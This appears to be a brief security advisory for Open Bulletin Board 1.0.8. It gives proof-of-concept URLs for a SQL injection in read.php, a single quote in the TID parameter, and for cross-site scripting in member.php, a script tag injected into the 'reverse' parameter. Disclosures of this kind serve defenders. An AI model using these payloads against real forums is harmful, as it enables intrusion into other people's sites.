Open Bulletin Board www.openbb.com Vulnerable versions: 1.0.8 * OpenBB read.php SQL Injection Vulnerability Proof of concept: http://www.example.com/openbb/read.php?action=lastpost&TID=' http://www.example.com/openbb/read.php?TID=' * OpenBB member.php Cross-Site Scripting Vulnerability Proof of concept: http://www.example.com/member.php?action=list&page=2&sortorder=username&perpage=25&reverse="><script>alert('test');</script>